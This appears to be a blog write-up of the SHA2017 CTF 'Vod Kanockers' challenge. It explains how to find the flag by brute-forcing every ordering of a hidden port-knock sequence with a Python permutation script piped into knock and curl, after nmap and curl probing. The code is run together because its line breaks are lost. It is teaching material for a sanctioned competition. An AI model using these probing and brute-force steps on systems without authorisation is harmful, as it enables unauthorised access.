SHA2017 CTF writeup — Vod Kanockers

Cong Wang
Cong Wang
Aug 8, 2017 · 2 min read

The name is Kanockers. Vod Kanockers.

Click the link and view the source of that page. Find out the hint:

<!-- *Knock Knock* 88 156 983 1287 8743 5622 9123 -->

This reminds me of https://wiki.archlinux.org/index.php/Port_knocking. This means we have to “knock” these ports in a predefined order and then some port, either in this list or not in this list, will be open to us.

Let’s find out which of them are not fully closed. Try curl to each of them, only the last one does not return a RST.

Then try to knock them with the command knock:

knock vod.stillhackinganyway.nl 88 156 983 1287 8743 5622 9123 -v

and try curl on 9123 again, still no response, our SYN packets are still dropped there. So either the “target” port is not 9123, or the above order is not correct.

Use nmap to scan that host to see if there is any other port not in this list is open. Nope!

Now, we have to figure out the order! It is quite easy to brute force these 7! sequences, with the following Python code:

import itertoolsfor l in itertools.permutations([88, 156, 983, 1287, 8743, 5622, 9123]):print " ".join(map(str, l))

Now pipe each line of the output to knock :

python permute_ports.py | while read idoecho $iknock vod.stillhackinganyway.nl $icurl --connect-timeout 1 vod.stillhackinganyway.nl:9123done

The flag will be shown.

Happy hacking!

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade